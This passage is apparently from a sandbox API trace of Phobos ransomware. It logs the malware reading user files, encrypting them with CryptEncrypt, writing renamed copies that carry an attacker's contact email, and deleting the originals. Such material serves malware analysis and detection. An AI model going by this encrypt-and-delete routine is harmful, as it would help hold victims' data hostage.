lpNewFilePointer=0x0) returned 1 [0201.762] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_Niwl24vFC ZEfC.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\_niwl24vfc zefc.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.762] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0201.762] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.762] ReadFile (in: hFile=0xfc, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x14ee, lpOverlapped=0x0) returned 1 [0201.764] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x14f0, dwBufLen=0x14f0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x14f0) returned 1 [0201.764] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x14f0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x14f0, lpOverlapped=0x0) returned 1 [0201.765] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32868) returned 1 [0201.765] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.765] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0201.765] CryptDestroyKey (hKey=0xa32868) returned 1 [0201.765] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0201.765] CryptDestroyKey (hKey=0xa32a28) returned 1 [0201.765] CloseHandle (hObject=0xfc) returned 1 [0201.765] CloseHandle (hObject=0x174) returned 1 [0201.765] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_Niwl24vFC ZEfC.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\_niwl24vfc zefc.lnk")) returned 1 [0201.766] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0201.766] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_paWYJrw.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\_pawyjrw.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.767] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=3699) returned 1 [0201.767] CloseHandle (hObject=0x174) returned 1 [0201.767] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_paWYJrw.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\_pawyjrw.lnk")) returned 0x20 [0201.767] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_paWYJrw.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\_pawyjrw.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.767] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_paWYJrw.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\_pawyjrw.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.767] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.767] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.767] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_paWYJrw.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\_pawyjrw.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.768] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0201.768] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.768] ReadFile (in: hFile=0x174, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xe73, lpOverlapped=0x0) returned 1 [0201.769] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xe80, dwBufLen=0xe80 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xe80) returned 1 [0201.769] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe80, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xe80, lpOverlapped=0x0) returned 1 [0201.770] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32868) returned 1 [0201.770] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.770] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0201.770] CryptDestroyKey (hKey=0xa32868) returned 1 [0201.770] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0201.770] CryptDestroyKey (hKey=0xa32a28) returned 1 [0201.770] CloseHandle (hObject=0x174) returned 1 [0201.771] CloseHandle (hObject=0xfc) returned 1 [0201.771] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_paWYJrw.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\_pawyjrw.lnk")) returned 1 [0201.771] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0201.771] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_WkKzsf7W.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\_wkkzsf7w.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.772] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1005) returned 1 [0201.773] CloseHandle (hObject=0xfc) returned 1 [0201.773] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_WkKzsf7W.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\_wkkzsf7w.lnk")) returned 0x20 [0201.773] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_WkKzsf7W.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\_wkkzsf7w.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.773] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_WkKzsf7W.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\_wkkzsf7w.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.773] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.773] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.773] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_WkKzsf7W.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\_wkkzsf7w.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.773] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0201.773] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.773] ReadFile (in: hFile=0xfc, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x3ed, lpOverlapped=0x0) returned 1 [0201.837] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3f0, dwBufLen=0x3f0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3f0) returned 1 [0201.837] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x3f0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x3f0, lpOverlapped=0x0) returned 1 [0201.838] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32928) returned 1 [0201.838] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.838] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0201.838] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.838] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0201.838] CryptDestroyKey (hKey=0xa32a28) returned 1 [0201.838] CloseHandle (hObject=0xfc) returned 1 [0201.838] CloseHandle (hObject=0x174) returned 1 [0201.838] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_WkKzsf7W.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\_wkkzsf7w.lnk")) returned 1 [0201.839] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0201.839] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Mail Recipient.MAPIMail" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\mail recipient.mapimail"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.840] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=4) returned 1 [0201.840] CloseHandle (hObject=0x174) returned 1 [0201.840] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Mail Recipient.MAPIMail" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\mail recipient.mapimail")) returned 0x2020 [0201.840] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Mail Recipient.MAPIMail.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\mail recipient.mapimail.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.840] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Mail Recipient.MAPIMail" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\mail recipient.mapimail"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.840] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.841] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.841] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Mail Recipient.MAPIMail.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\mail recipient.mapimail.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.841] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0201.841] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.841] ReadFile (in: hFile=0x174, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4, lpOverlapped=0x0) returned 1 [0201.842] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x10, dwBufLen=0x10 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x10) returned 1 [0201.842] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x10, lpOverlapped=0x0) returned 1 [0201.843] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32928) returned 1 [0201.843] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.843] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0201.843] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.843] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0201.843] CryptDestroyKey (hKey=0xa32a28) returned 1 [0201.843] CloseHandle (hObject=0x174) returned 1 [0201.843] CloseHandle (hObject=0xfc) returned 1 [0201.843] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Mail Recipient.MAPIMail" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\mail recipient.mapimail")) returned 1 [0201.844] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0201.844] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Ease of Access.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\ease of access.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.846] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1358) returned 1 [0201.846] CloseHandle (hObject=0xfc) returned 1 [0201.846] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Ease of Access.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\ease of access.lnk")) returned 0x20 [0201.847] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Ease of Access.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\ease of access.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.847] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Ease of Access.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\ease of access.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.847] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.847] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.847] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Ease of Access.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\ease of access.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.848] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0201.848] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.848] ReadFile (in: hFile=0xfc, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x54e, lpOverlapped=0x0) returned 1 [0201.870] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x550, dwBufLen=0x550 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x550) returned 1 [0201.870] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x550, lpOverlapped=0x0) returned 1 [0201.871] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32928) returned 1 [0201.871] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.871] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0201.871] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.871] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0201.871] CryptDestroyKey (hKey=0xa32a28) returned 1 [0201.871] CloseHandle (hObject=0xfc) returned 1 [0201.871] CloseHandle (hObject=0x174) returned 1 [0201.871] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Ease of Access.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\ease of access.lnk")) returned 1 [0201.873] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0201.873] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Magnify.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\magnify.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.874] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1258) returned 1 [0201.874] CloseHandle (hObject=0x174) returned 1 [0201.874] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Magnify.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\magnify.lnk")) returned 0x20 [0201.874] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Magnify.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\magnify.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.874] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Magnify.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\magnify.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 